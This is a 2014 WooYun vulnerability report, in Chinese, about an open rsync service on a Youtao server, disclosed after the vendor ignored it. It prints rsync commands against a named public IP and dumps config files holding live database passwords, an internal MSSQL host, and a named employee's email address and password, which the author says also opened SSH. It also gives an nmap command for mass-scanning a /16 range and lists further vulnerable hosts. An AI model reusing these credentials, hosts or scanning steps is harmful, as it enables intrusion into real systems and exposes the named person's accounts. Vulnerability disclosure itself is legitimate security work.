当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047689

漏洞标题:优淘网某服务器rsync配置错误泄漏信息

相关厂商:优淘网

漏洞作者: l137

提交时间:2014-01-02 16:53

修复时间:2014-02-16 16:53

公开时间:2014-02-16 16:53

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

优淘某站点rsync配置未设置访问权限,造成rsync任意下载,任意上传...
重要的数据库,邮箱,ssh帐号(貌似是技术部门负责人)的配置信息被硬编码在代码中造成泄漏

详细说明:

同问题描述

liet@kali:~$ rsync 210.14.138.23::
tspweb         	tspweb file
newtspweb      	newtspweb file
system         	tspweb file


找一下配置文件,mssql是可以外网登入的,mysql试了下不行,用邮箱的帐号也可以登入ssh

liet@kali:~/code/python/study/sec/rsync_hack/210.14.138.23/tspweb/config/tspweb$ ls
database.config.php  mail.config.php  page.config.php  router.config.php  smarty.config.php  sync.config.php


数据库配置文件

<?php
/**
 * db.config.php
 *
 * 数据库配置文件
 *
 * youtao for framework
 *
 * @package	youtaosystem
 * @author	hirry(lijinhou@youtao.com)
 * @since	version 1.0
 * @time	2012-6-29
 */
return array(
    'mySqlMaster' => array(
        'driver' => 'mysql',
        'dbhost' => 'localhost',
        'dbname' => 'youtao',
        'dbuser' => 'tspyoutaoadmin',
        'dbpass' => 'tspyoutaoadmin@WSX',
        'dbport' => '3306'
    ),
    'mySqlRead' => array(
    	'driver' => 'mysql',
        'dbhost' => 'localhost',
        'dbname' => 'youtao',
        'dbuser' => 'tspyoutaoadmin',
        'dbpass' => 'tspyoutaoadmin@WSX',
        'dbport' => '3306'
    ),
    
    'sqlServerMaster' => array(
        'driver' => 'mssql',
        'dbhost' => '192.168.1.3',
        'dbname' => 'youtao',
        'dbuser' => 'youtaoasp',
        'dbpass' => 'youtaooldwebadmin',
        'dbport' => '1433'
    ),
    'sqlServerRead' => array(
        'driver' => 'mssql',
        'dbhost' => '192.168.1.3',
        'dbname' => 'youtao',
        'dbuser' => 'youtaoasp',
        'dbpass' => 'youtaooldwebadmin',
        'dbport' => '1433'
    )
    
);
        /*
         return array(
         'mySqlMaster' => array(
         'driver' => 'mysql',
         'dbhost' => 'localhost',
         'dbname' => 'youtao',
         'dbuser' => 'root',
         'dbpass' => 'houhou123',
         'dbport' => '3306'
         ),
         'mySqlRead' => array(
         'driver' => 'mysql',
         'dbhost' => 'localhost',
         'dbname' => 'youtao',
         'dbuser' => 'root',
         'dbpass' => 'houhou123',
         'dbport' => '3306'
         )
         );
         */


cat mail.config.php 
<?php
/**
 * mail.config.php
 * 
 * mail配置文件
 *
 * youtao for framework 
 *
 * @package	youtaosystem
 * @author	hirry(lijinhou@youtao.com)
 * @since	version 1.0
 * @time	2012-6-29
 */
return array(
    'mail_charset' => 'utf-8',
    'mail_host' => 'smtp.youtao.com',
    'mail_username' => 'lijinhou@youtao.com',
	'mail_password' => 'houhou123',
	'mail_fromname' => '优淘官网-第三方销售渠道整合平台   ', //邮箱显示名称
	'mail_from' => 'lijinhou@youtao.com',
	'mail_ishtml' => 'true' //是否支持html邮件,true 或false
);
?>


rsync 经常用来同步web部分的代码,rsync控制不好,相当于直接给其他人留了一个任意的上传下载的漏洞,直接rsync -R ./xxx remote:/webroot/ 这个比费劲挖shell简单多了,结合nmap
sudo nmap -sS -Pn -T4 -p873 xxx.xxx.0.0/16 -oX out.xml
跟一点自己写的小脚本可以对全网段的rsync弱配置进行检测,已大面积拟补精度上的不足..
比如对210.14..0.0/16批量检测下,就得到两个弱配置

210.14.138.23
210.14.152.120

漏洞证明:

Screenshot from 2014-01-02 16:31:55.png


邮箱

Screenshot from 2014-01-02 15:27:19.png


内网登入

210.14.138.23.png


210.14.138.23_ifconfig.png


msf 测试 mssql可登入

210.14.138.3_mssql.png


修复方案:

几条配置,你们可以的

版权声明:转载请注明来源 l137@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝